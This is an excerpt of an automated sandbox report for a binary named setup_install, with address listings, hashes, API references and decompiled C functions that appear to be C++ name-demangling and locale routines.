0x0040b053
0x0040b056
0x0040b05c
0x0040b05c
0x0040b0a6
0x00000000
0x0040b0a6
0x0040aea1
0x0040aea1
0x0040aea4
0x00000000
0x00000000
0x0040aea6
0x0040af10
0x0040af13
0x0040aeb0
0x0040aeb8
0x0040aebd
0x00000000
0x0040aebd
0x00000000
0x0040af13
0x0040aeab
0x0040aeae
0x00000000
0x00000000
0x00000000
0x0040aeae
0x0040ae44
0x0040ae47
0x0040ae4c
0x0040ae54
0x0040ae5b
0x0040ae63
0x0040ae67
0x0040ae6a
0x0040ae70
0x0040ae77
0x0040ae7c
0x0040ae7c
0x0040ae7c
0x0040ae7e
0x0040ae84
0x0040ae88
0x00000000
0x0040ae88
0x0040adcb
0x0040add0
0x00000000
0x0040add0
0x0040adba
0x0040adfe
0x0040adfe
0x0040ae01
0x00000000
0x0040ae03
0x0040ae03
0x0040ad93
0x0040ad96
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ae05
0x0040ae08
0x0040ae0b
0x00000000
0x0040ae0d
0x00000000
0x0040ae0d
0x0040ae0b
0x0040ae03
0x0040ae01
0x0040adfc
0x0040adf3

Strings

default arg#, xrefs: 0040AF9B
-1J, xrefs: 0040B0CD
&1J, xrefs: 0040AFBB
}::, xrefs: 0040B0AA
'1J, xrefs: 0040B012

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID: &1J$'1J$-1J$default arg#$}::
API String ID: 0-1647035
Opcode ID: c9e0c6d17be2c2b547f93f376ad12f9de84ec2c6271c7b28da24b475bee946ee
Instruction ID: c1fbbd79c97ed15a2c9d912153bb6f221c30af54213353a22270a3bb16e182da
Opcode Fuzzy Hash: c9e0c6d17be2c2b547f93f376ad12f9de84ec2c6271c7b28da24b475bee946ee
Instruction Fuzzy Hash: F9B183702087418BC725CF28C0847EBBBE1EF95304F14883EE4D99B781D779A9959B9B

Uniqueness

Uniqueness Score: -1.00%

Function 00426830, Relevance: 10.8, APIs: 6, Strings: 1, Instructions: 250stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00426890
strlen.MSVCRT ref: 004268D0
strlen.MSVCRT ref: 0042692D
strlen.MSVCRT ref: 00426994
strlen.MSVCRT ref: 004269F9

Part of subcall function 00485180: memcpy.MSVCRT ref: 004851BC

strlen.MSVCRT ref: 00426AA6

Strings

*, xrefs: 00426B00

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strlen$memcpystrcmp
String ID: *
API String ID: 566201450-163128923
Opcode ID: ff4146778fa3f2c956e4d731afd1ce83b5d0d26842103e746e0c8ae525485073
Instruction ID: eb5ed430a8ea683f88fca1911c20fd6d34f5c70e71c87a04cde65df1c0900170
Opcode Fuzzy Hash: ff4146778fa3f2c956e4d731afd1ce83b5d0d26842103e746e0c8ae525485073
Instruction Fuzzy Hash: EFA13BB1A04611CFCB00EF69C08066EBBF1AF45318F55C96EE8889B346D739E845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00426BB0, Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 196stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0045F9D0: memset.MSVCRT ref: 0045FA15

strcmp.MSVCRT ref: 00426C20
strlen.MSVCRT ref: 00426C60
strlen.MSVCRT ref: 00426CBB
strlen.MSVCRT ref: 00426D22
strlen.MSVCRT ref: 00426D87

Part of subcall function 004602C0: memcpy.MSVCRT ref: 0046031F

strlen.MSVCRT ref: 00426DCB

Strings

*, xrefs: 00426DF0

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: strlen$memcpymemsetstrcmp
String ID: *
API String ID: 1303273620-163128923
Opcode ID: c5538ef1c9ce9487569cca21e2af020aa8e73c27c73f523e99c7424b42e0a1f7
Instruction ID: dd8ce1d7108f910edc3f27f19d557757f9630ddbc3c9efd67c495454057ddb67
Opcode Fuzzy Hash: c5538ef1c9ce9487569cca21e2af020aa8e73c27c73f523e99c7424b42e0a1f7
Instruction Fuzzy Hash: 0D814AB5B056108FCB00EF29D48865EFBF5FF88304F0585AEE9849B325D734A809CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004072A4, Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 163
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004072A4(intOrPtr __ebx) {
				signed int _t92;
				signed int _t93;
				void* _t101;
				signed int _t102;
				signed int _t107;
				intOrPtr _t114;
				signed int _t117;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t128;
				signed int _t132;
				signed int _t133;
				char* _t135;
				char* _t137;
				signed char* _t141;
				intOrPtr _t142;
				signed char* _t143;
				intOrPtr* _t144;
				void* _t146;
				intOrPtr* _t148;

				_t114 = __ebx;
				_t133 =  *(_t148 + 0x18);
				E00405780(__ebx,  *((intOrPtr*)(_t146 + 8)), _t133);
				_t91 = _t133;
				if((_t133 & 0x00000004) == 0) {
					_t92 =  *(__ebx + 0x100);
					_t143 = 0x4a3116;
					do {
						_t124 =  *_t143 & 0x000000ff;
						if(_t92 != 0xff) {
							_t117 = _t92;
							_t92 = _t92 + 1;
						} else {
							 *((char*)(_t114 + 0xff)) = 0;
							 *(_t148 + 0x1c) = _t124;
							 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t114 + 0x10c));
							 *((intOrPtr*)(_t148 + 4)) = 0xff;
							 *_t148 = _t114;
							 *((intOrPtr*)(_t114 + 0x108))();
							 *((intOrPtr*)(_t114 + 0x128)) =  *((intOrPtr*)(_t114 + 0x128)) + 1;
							_t92 = 1;
							_t117 = 0;
							_t124 =  *(_t148 + 0x1c) & 0x000000ff;
						}
						_t143 =  &(_t143[1]);
						 *(_t114 + 0x100) = _t92;
						 *(_t114 + _t117) = _t124;
						 *(_t114 + 0x104) = _t124;
					} while (0x4a3118 != _t143);
					goto L5;
				} else {
					if( *((intOrPtr*)(__ebx + 0x100)) == 0xff) {
						__eax =  *((intOrPtr*)(__ebx + 0x10c));
						 *((char*)(__ebx + 0xff)) = 0;
						 *((intOrPtr*)(__esp + 4)) = 0xff;
						 *((intOrPtr*)(__esp + 8)) =  *((intOrPtr*)(__ebx + 0x10c));
						 *__esp = __ebx;
						__eax =  *((intOrPtr*)(__ebx + 0x108))();
						 *((intOrPtr*)(__ebx + 0x128)) =  *((intOrPtr*)(__ebx + 0x128)) + 1;
						 *((intOrPtr*)(__ebx + 0x100)) = 0;
					}
					__eax =  *((intOrPtr*)(__ebx + 0x100));
					_t18 = __eax + 1; // 0x100
					__edx = _t18;
					 *((intOrPtr*)(__ebx + 0x100)) = __edx;
					 *((char*)(__ebx + __eax)) = 0x2e;
					 *((char*)(__ebx + 0x104)) = 0x2e;
					L5:
					_t144 =  *((intOrPtr*)(_t146 + 0xc));
					if( *_t144 == 0x46) {
						_t93 =  *(_t114 + 0x100);
						_t135 = "{default arg#";
						do {
							_t125 =  *_t135 & 0x000000ff;
							if(_t93 != 0xff) {
								_t118 = _t93;
								_t93 = _t93 + 1;
							} else {
								 *((char*)(_t114 + 0xff)) = 0;
								 *(_t148 + 0x1c) = _t125;
								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t114 + 0x10c));
								 *((intOrPtr*)(_t148 + 4)) = 0xff;
								 *_t148 = _t114;
								 *((intOrPtr*)(_t114 + 0x108))();
								 *((intOrPtr*)(_t114 + 0x128)) =  *((intOrPtr*)(_t114 + 0x128)) + 1;
								_t93 = 1;
								_t118 = 0;
								_t125 =  *(_t148 + 0x1c) & 0x000000ff;
							}
							 *(_t114 + 0x100) = _t93;
							_t135 =  &(_t135[1]);
							 *(_t114 + _t118) = _t125;
							 *(_t114 + 0x104) = _t125;
						} while (0x4a3126 != _t135);
						 *((intOrPtr*)(_t148 + 4)) = "%d";
						 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t144 + 0xc)) + 1;
						 *_t148 = _t148 + 0x40;
						sprintf(??, ??);
						asm("repne scasb");
						_t101 =  !(_t118 | 0xffffffff) - 1;
						_t127 = _t101;
						if(_t101 == 0) {
							L23:
							_t102 =  *(_t114 + 0x100);
							_t137 = "}::";
							do {
								_t128 =  *_t137 & 0x000000ff;
								if(_t102 != 0xff) {
									_t120 = _t102;
									_t102 = _t102 + 1;
								} else {
									 *((char*)(_t114 + 0xff)) = 0;
									 *(_t148 + 0x1c) = _t128;
									 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t114 + 0x10c));
									 *((intOrPtr*)(_t148 + 4)) = 0xff;
									 *_t148 = _t114;
									 *((intOrPtr*)(_t114 + 0x108))();
									 *((intOrPtr*)(_t114 + 0x128)) =  *((intOrPtr*)(_t114 + 0x128)) + 1;
									_t102 = 1;
									_t120 = 0;
									_t128 =  *(_t148 + 0x1c) & 0x000000ff;
								}
								 *(_t114 + 0x100) = _t102;
								_t137 =  &(_t137[1]);
								 *(_t114 + _t120) = _t128;
								 *(_t114 + 0x104) = _t128;
							} while (0x4a312d != _t137);
							_t144 =  *((intOrPtr*)(_t144 + 8));
							goto L6;
						}
						_t141 = _t148 + 0x40;
						_t107 =  *(_t114 + 0x100);
						 *(_t148 + 0x1c) = _t127 + _t141;
						do {
							_t132 =  *_t141 & 0x000000ff;
							if(_t107 != 0xff) {
								_t122 = _t107;
								_t107 = _t107 + 1;
							} else {
								 *((char*)(_t114 + 0xff)) = 0;
								 *(_t148 + 0x20) = _t132;
								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t114 + 0x10c));
								 *((intOrPtr*)(_t148 + 4)) = 0xff;
								 *_t148 = _t114;
								 *((intOrPtr*)(_t114 + 0x108))();
								 *((intOrPtr*)(_t114 + 0x128)) =  *((intOrPtr*)(_t114 + 0x128)) + 1;
								_t107 = 1;
								_t122 = 0;
								_t132 =  *(_t148 + 0x20) & 0x000000ff;
							}
							 *(_t114 + 0x100) = _t107;
							_t141 =  &(_t141[1]);
							 *(_t114 + _t122) = _t132;
							 *(_t114 + 0x104) = _t132;
						} while ( *(_t148 + 0x1c) != _t141);
						goto L23;
					}
					L6:
					E00405780(_t114, _t144,  *(_t148 + 0x18));
					_t91 =  *(_t148 + 0x34);
					_t142 =  *((intOrPtr*)(_t146 + 4)) - 1;
					_t133 =  *(_t114 + 0x11c) - 1;
					 *(_t114 + 0x12c) = _t91;
					 *((intOrPtr*)(_t146 + 4)) = _t142;
					 *(_t114 + 0x11c) = _t133;
					return _t91;
				}
			}

0x004072a4
0x004072a4
0x004072af
0x004072b4
0x004072b8
0x0040897b
0x00408981
0x004089ac
0x004089ac
0x004089b4
0x0040898d
0x0040898f
0x004089b6
0x004089bc
0x004089c3
0x004089c7
0x004089cb
0x004089d3
0x004089d6
0x004089dc
0x004089e3
0x004089e8
0x004089ea
0x004089ea
0x00408992
0x00408995
0x0040899b
0x0040899e
0x004089a4
0x00000000
0x004072be
0x004072c8
0x004072ca
0x004072d0
0x004072d7
0x004072df
0x004072e3
0x004072e6
0x004072ec
0x004072f3
0x004072f3
0x004072fd
0x00407303
0x00407303
0x00407306
0x0040730c
0x00407310
0x00407317
0x00407317
0x0040731d
0x004091c3
0x004091c9
0x004091f0
0x004091f0
0x004091f8
0x004091d0
0x004091d2
0x004091fa
0x00409200
0x00409207
0x0040920b
0x0040920f
0x00409217
0x0040921a
0x00409220
0x00409227
0x0040922c
0x0040922e
0x0040922e
0x004091d5
0x004091db
0x004091de
0x004091e1
0x004091ec
0x00409238
0x00409247
0x0040924f
0x00409252
0x0040925c
0x00409262
0x00409265
0x00409267
0x004092dd
0x004092dd
0x004092e3
0x0040930a
0x0040930a
0x00409312
0x004092ea
0x004092ec
0x00409314
0x0040931a
0x00409321
0x00409325
0x00409329
0x00409331
0x00409334
0x0040933a
0x00409341
0x00409346
0x00409348
0x00409348
0x004092ef
0x004092f5
0x004092f8
0x004092fb
0x00409306
0x0040934f
0x00000000
0x0040934f
0x00409269
0x0040926d
0x00409275
0x00409298
0x00409298
0x004092a0
0x0040927b
0x0040927d
0x004092a2
0x004092a8
0x004092af
0x004092b3
0x004092b7
0x004092bf
0x004092c2
0x004092c8
0x004092cf
0x004092d4
0x004092d6
0x004092d6
0x00409280
0x00409286
0x00409289
0x0040928c
0x00409292
0x00000000
0x00409298
0x00407323
0x0040732b
0x00407333
0x00407337
0x00407340
0x00405981
0x00405987
0x0040598a
0x0040599a
0x0040599a

Strings

-1J, xrefs: 00409301
{default arg#, xrefs: 004091C9
&1J, xrefs: 004091E7
., xrefs: 00407310
}::, xrefs: 004092E3
'1J, xrefs: 00409238

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID: &1J$'1J$-1J$.${default arg#$}::
API String ID: 0-3361512604
Opcode ID: e3a9774daaf42694dee6d33f088619370b8f407366e13bad22c3e04087366fd5
Instruction ID: b0e1b88d17f3b00d9662b1c120d2ebf0fb3bab248e86f15c37b71dcd85da9474
Opcode Fuzzy Hash: e3a9774daaf42694dee6d33f088619370b8f407366e13bad22c3e04087366fd5
Instruction Fuzzy Hash: 9171107050D2428BC7118F28C0947E57BE1AFA5314F1884BEECC99F387D7B99885DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00405D44, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00405D44(signed int* __ebx) {
				signed int _t75;
				signed int _t78;
				signed int* _t81;
				unsigned int _t85;
				void* _t86;
				signed int _t87;
				signed int _t88;
				signed int* _t97;
				signed int _t99;
				signed int _t101;
				signed int _t102;
				signed int _t109;
				signed int _t110;
				signed int _t112;
				signed int* _t113;
				void* _t115;
				signed int _t117;
				signed char* _t121;
				signed int _t124;
				char* _t126;
				signed char* _t127;
				intOrPtr _t128;
				signed char* _t130;
				void* _t131;
				signed int** _t133;

				_t97 = __ebx;
				_t75 = __ebx[0x40];
				_t126 = "lambda(";
				_t110 = 0x7b;
				L5:
				L5:
				if(_t75 != 0xff) {
					_t99 = _t75;
					_t75 = _t75 + 1;
				} else {
					_t97[0x3f] = 0;
					_t133[7] = _t110;
					_t133[2] = _t97[0x43];
					_t133[1] = 0xff;
					 *_t133 = _t97;
					_t97[0x42]();
					_t97[0x4a] = _t97[0x4a] + 1;
					_t75 = 1;
					_t99 = 0;
					_t110 = _t133[7] & 0x000000ff;
				}
				_t97[0x40] = _t75;
				 *(_t97 + _t99) = _t110;
				_t97[0x41] = _t110;
				if(0x4a335f == _t126) {
					goto L7;
				}
				_t110 =  *_t126 & 0x000000ff;
				_t126 =  &(_t126[1]);
				goto L5;
				L7:
				_t127 = ")#";
				_t97[0x48] = _t97[0x48] + 1;
				E00405780(_t97,  *((intOrPtr*)(_t131 + 8)), _t133[6]);
				_t78 = _t97[0x40];
				_t112 = 0x29;
				_t97[0x48] = _t97[0x48] - 1;
				L11:
				L11:
				if(_t78 != 0xff) {
					_t101 = _t78;
					_t78 = _t78 + 1;
				} else {
					_t97[0x3f] = 0;
					_t133[6] = _t112;
					_t133[2] = _t97[0x43];
					_t133[1] = 0xff;
					 *_t133 = _t97;
					_t97[0x42]();
					_t97[0x4a] = _t97[0x4a] + 1;
					_t78 = 1;
					_t101 = 0;
					_t112 = _t133[6] & 0x000000ff;
				}
				_t127 =  &(_t127[1]);
				_t97[0x40] = _t78;
				 *(_t97 + _t101) = _t112;
				_t97[0x41] = _t112;
				if(0x4a3362 == _t127) {
					goto L13;
				}
				_t112 =  *_t127 & 0x000000ff;
				goto L11;
				L13:
				_t133[1] = "%d";
				_t133[2] =  *((intOrPtr*)(_t131 + 0xc)) + 1;
				_t81 =  &(_t133[0x10]);
				 *_t133 = _t81;
				_t133[7] = _t81;
				sprintf(??, ??);
				_t113 = _t81;
				do {
					_t102 =  *_t113;
					_t113 =  &(_t113[1]);
					_t85 = _t102 - 0x01010101 &  !_t102 & 0x80808080;
				} while (_t85 == 0);
				_t121 = _t133[7];
				_t86 =  ==  ? _t85 >> 0x10 : _t85;
				_t114 =  ==  ?  &(_t113[0]) : _t113;
				_t87 = _t97[0x40];
				asm("sbb edx, 0x3");
				_t115 = ( ==  ?  &(_t113[0]) : _t113) - _t121;
				if(_t115 == 0) {
					L21:
					if(_t87 == 0xff) {
						_t97[0x3f] = 0;
						_t133[1] = 0xff;
						_t133[2] = _t97[0x43];
						 *_t133 = _t97;
						_t97[0x42]();
						_t97[0x4a] = _t97[0x4a] + 1;
						_t87 = 0;
					}
					_t97[0x40] = _t87 + 1;
					 *((char*)(_t97 + _t87)) = 0x7d;
					_t88 = _t133[0xd];
					_t97[0x41] = 0x7d;
					_t72 = _t131 + 4; // 0x4a3127
					_t128 =  *_t72 - 1;
					_t124 = _t97[0x47] - 1;
					_t97[0x4b] = _t88;
					 *((intOrPtr*)(_t131 + 4)) = _t128;
					_t97[0x47] = _t124;
					return _t88;
				}
				_t130 =  &(_t121[_t115]);
				do {
					_t117 =  *_t121 & 0x000000ff;
					if(_t87 != 0xff) {
						_t109 = _t87;
						_t87 = _t87 + 1;
					} else {
						_t97[0x3f] = 0;
						_t133[6] = _t117;
						_t133[2] = _t97[0x43];
						_t133[1] = 0xff;
						 *_t133 = _t97;
						_t97[0x42]();
						_t97[0x4a] = _t97[0x4a] + 1;
						_t87 = 1;
						_t109 = 0;
						_t117 = _t133[6] & 0x000000ff;
					}
					_t121 =  &(_t121[1]);
					_t97[0x40] = _t87;
					 *(_t97 + _t109) = _t117;
					_t97[0x41] = _t117;
				} while (_t130 != _t121);
				goto L21;
			}

0x00405d44
0x00405d44
0x00405d4a
0x00405d54
0x00000000
0x00405d82
0x00405d87
0x00405d60
0x00405d62
0x00405d89
0x00405d8f
0x00405d96
0x00405d9a
0x00405d9e
0x00405da6
0x00405da9
0x00405daf
0x00405db6
0x00405dbb
0x00405dbd
0x00405dbd
0x00405d65
0x00405d6b
0x00405d6e
0x00405d76
0x00000000
0x00000000
0x00405d7c
0x00405d7f
0x00000000
0x00407d50
0x00407d59
0x00407d5e
0x00407d6a
0x00407d6f
0x00407d75
0x00407d7a
0x00000000
0x00407da1
0x00407da6
0x00407d83
0x00407d85
0x00407da8
0x00407dae
0x00407db5
0x00407db9
0x00407dbd
0x00407dc5
0x00407dc8
0x00407dce
0x00407dd5
0x00407dda
0x00407ddc
0x00407ddc
0x00407d88
0x00407d8b
0x00407d91
0x00407d94
0x00407d9c
0x00000000
0x00000000
0x00407d9e
0x00000000
0x00407de3
0x00407de6
0x00407df1
0x00407df5
0x00407df9
0x00407dfe
0x00407e02
0x00407e07
0x00407e09
0x00407e09
0x00407e0b
0x00407e18
0x00407e18
0x00407e21
0x00407e2d
0x00407e33
0x00407e3a
0x00407e40
0x00407e43
0x00407e45
0x00407eb0
0x00407eb5
0x00407ebd
0x00407ec4
0x00407ecc
0x00407ed0
0x00407ed3
0x00407ed9
0x00407ee0
0x00407ee0
0x00407ee5
0x00407eeb
0x00407eef
0x00407ef3
0x00407efa
0x00407efd
0x00407f06
0x00405981
0x00405987
0x0040598a
0x0040599a
0x0040599a
0x00407e47
0x00407e6b
0x00407e6b
0x00407e73
0x00407e50
0x00407e52
0x00407e75
0x00407e7b
0x00407e82
0x00407e86
0x00407e8a
0x00407e92
0x00407e95
0x00407e9b
0x00407ea2
0x00407ea7
0x00407ea9
0x00407ea9
0x00407e55
0x00407e58
0x00407e5e
0x00407e61
0x00407e67
0x00000000

Strings

`3J, xrefs: 00407D59
'1J, xrefs: 00407EFA
}, xrefs: 00407EF3
_3J, xrefs: 00405D4F
lambda(, xrefs: 00405D4A
b3J, xrefs: 00407D65

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID:
String ID: '1J$_3J$`3J$b3J$lambda($}
API String ID: 0-3382967288
Opcode ID: d148d8931b1a268a7d63c9f4cdee8db210d57c8eb20fb351f6aa35ce5fb21f7d
Instruction ID: 8560edf71f98434fcb3e92352ecd34b41c488c763e44186621c591ee0738c3b3
Opcode Fuzzy Hash: d148d8931b1a268a7d63c9f4cdee8db210d57c8eb20fb351f6aa35ce5fb21f7d
Instruction Fuzzy Hash: 1351307150D2418BCB15CF28C0C43AA7BE1AFA5304F1884BEECC99F387D779A8859B56

Uniqueness

Uniqueness Score: -1.00%

Function 00490710, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 0049072A
strlen.MSVCRT ref: 00490734
memcpy.MSVCRT ref: 00490751
setlocale.MSVCRT ref: 00490765
setlocale.MSVCRT ref: 004907BD

Strings

`CJ, xrefs: 00490756

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID: `CJ
API String ID: 4096897932-4207650426
Opcode ID: b31a29408a1bedabdfced80f55349594fad964b166832a2dccc462b6b3ef6125
Instruction ID: 1919b272c6e409580610918d48483297b3d7b5cb36296aae536fb93f92a9c9e9
Opcode Fuzzy Hash: b31a29408a1bedabdfced80f55349594fad964b166832a2dccc462b6b3ef6125
Instruction Fuzzy Hash: 2F31BAB09083009FCB01BF51D88124EBFF0EB85384F0188AEE4C447362E33998908B8A

Uniqueness

Uniqueness Score: -1.00%

Function 00490830, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 0049084A
strlen.MSVCRT ref: 00490854
memcpy.MSVCRT ref: 00490871
setlocale.MSVCRT ref: 00490885
setlocale.MSVCRT ref: 004908E0

Strings

`CJ, xrefs: 00490876

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID: `CJ
API String ID: 4096897932-4207650426
Opcode ID: 8172782e0e2727c80612efacd81ceeafdfab7717072eaab58267b2a614848589
Instruction ID: 9cf6fd664f60b4a2c98ea8ef22f08c408f96d0976ba3fcced69008644f8af24b
Opcode Fuzzy Hash: 8172782e0e2727c80612efacd81ceeafdfab7717072eaab58267b2a614848589
Instruction Fuzzy Hash: B92141B1A0C3559EDB02BF65D48065EBFF0EB85784F11885FE4C587362E33988518BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00490940, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 0049095A
strlen.MSVCRT ref: 00490964
memcpy.MSVCRT ref: 00490981
setlocale.MSVCRT ref: 00490995
setlocale.MSVCRT ref: 004909ED

Strings

`CJ, xrefs: 00490986

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID: `CJ
API String ID: 4096897932-4207650426
Opcode ID: f12e82529f3664b7df681d83a2cba56bb8df384b5749c733cee3bd6ce3032905
Instruction ID: 57940dfa57e4bd8107c2151ed1af49301fc0e007a45b42ffb6f39a4fdbb7f54d
Opcode Fuzzy Hash: f12e82529f3664b7df681d83a2cba56bb8df384b5749c733cee3bd6ce3032905
Instruction Fuzzy Hash: CF2119F1A083059FDB01BF15C48575EBFF4EB85784F118C2EE48987352E37988908B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00483150, Relevance: 10.2, APIs: 8, Instructions: 214COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 004831F6
memcpy.MSVCRT ref: 0048321B
